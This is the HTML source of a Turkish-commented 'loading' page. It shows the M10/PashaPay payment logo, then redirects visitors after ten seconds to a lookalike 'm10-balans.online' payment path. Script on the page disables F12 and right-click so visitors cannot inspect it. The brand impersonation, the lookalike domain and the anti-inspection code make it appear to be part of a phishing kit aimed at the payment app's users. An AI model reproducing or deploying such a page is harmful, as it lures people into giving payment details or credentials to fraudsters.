<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Yükleme</title>
    <style>
        body {
            background-image: url('images/background.svg'); /* Arka plan resmi yolunu buraya ekleyin */
            background-size: cover;
            background-position: center;
            background-attachment: fixed;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        h1 {
            color: white;
        }

        #logo {
            margin-top: -50px; /* Logo yukarı taşınacak mesafe */
        }

        /* Dönen daire animasyonu */
        .loader {
            border: 16px solid #f3f3f3;
            border-top: 16px solid #3498db;
            border-radius: 50%;
            width: 120px;
            height: 120px;
            animation: spin 2s linear infinite;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
    <div id="logo">
        <img src="https://upload.wikimedia.org/wikipedia/commons/0/04/M10_by_PashaPay_logo_new.png" alt="Logo" width="200"> <!-- Logo resmini buraya ekleyin -->
    </div>
    <h1></h1>

    <div class="loader"></div>

    <script>
        // 10 saniye (10000 milisaniye) bekleyip sonra yönlendirme yap
        setTimeout(function() {
            window.location.href = "https://m10-balans.online/number/pay/index1.html"; // Yönlendirme işlemi
        }, 10000);
    </script>
 <SCRIPT LANGUAGE="Javascript"><!--
    // ***********************************************
    //     UYARISIZ SAG TIK VE F12 ENGELLEME KODU
    // ***********************************************
       document.onkeypress = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
              //alert('No F-12');
               return false;
           }
       }
       document.onmousedown = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
               //alert('No F-keys');
               return false;
           }
       }
    document.onkeydown = function (event) {
           event = (event || window.event);
           if (event.keyCode == 123) {
               //alert('No F-keys');
               return false;
           }
       }
    var isNS = (navigator.appName == "Netscape") ? 1 : 0;
    var EnableRightClick = 0;
    if(isNS)
    document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
    function mischandler(){
    if(EnableRightClick==1){ return true; }
    else {return false; }
    }
    function mousehandler(e){
    if(EnableRightClick==1){ return true; }
    var myevent = (isNS) ? e : event;
    var eventbutton = (isNS) ? myevent.which : myevent.button;
    if((eventbutton==2)||(eventbutton==3)) return false;
    }
    function keyhandler(e) {
    var myevent = (isNS) ? e : window.event;
    if (myevent.keyCode==96)
    EnableRightClick = 1;
    return;
    }
    document.oncontextmenu = mischandler;
    document.onkeypress = keyhandler;
    document.onmousedown = mousehandler;
    document.onmouseup = mousehandler;
    //-->
    </script>
</body>
</html>